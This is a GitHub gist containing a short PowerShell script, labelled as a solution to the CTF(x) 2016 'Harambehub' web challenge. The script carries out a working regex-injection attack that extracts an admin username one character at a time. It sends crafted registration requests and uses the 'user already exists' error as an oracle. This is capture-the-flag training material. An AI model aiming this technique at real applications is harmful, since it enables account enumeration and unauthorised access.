Skip to content

Instantly share code, notes, and snippets.

@ITAYC0HEN

ITAYC0HEN/RegexInjection.ps1

Created August 31, 2016 20:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ITAYC0HEN/c1f140baa5c538e7525a24c449abbf8f to your computer and use it in GitHub Desktop.
Save ITAYC0HEN/c1f140baa5c538e7525a24c449abbf8f to your computer and use it in GitHub Desktop.
Download ZIP
[CTF(x) 2016 : WEB] Harambehub – 100 pts
Raw
RegexInjection.ps1
# Written by: Itay Cohen, Aug 2016
$lowercase = [char[]]([int][char]'a'..[int][char]'z')
$uppercase = [char[]]([int][char]'A'..[int][char]'Z')
$numbers = 0..9
$chars = $lowercase+$uppercase+$numbers
function RegexInjection($regex){
foreach($c in $chars)
{
$postParams = @{username="$regex$c"+'.*';password='mega'; real_name="beets"}
try
{
$response = Invoke-WebRequest "http://problems.ctfx.io:7003/users" -Method POST -Body $postParams;
if($response.content -like "FAILED: User with that name already exists!")
{
Write-Host "Match found: $regex$c.*"
RegexInjection($regex+$c)
}
}
catch {}
}
}
RegexInjection("\[Admin\]")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment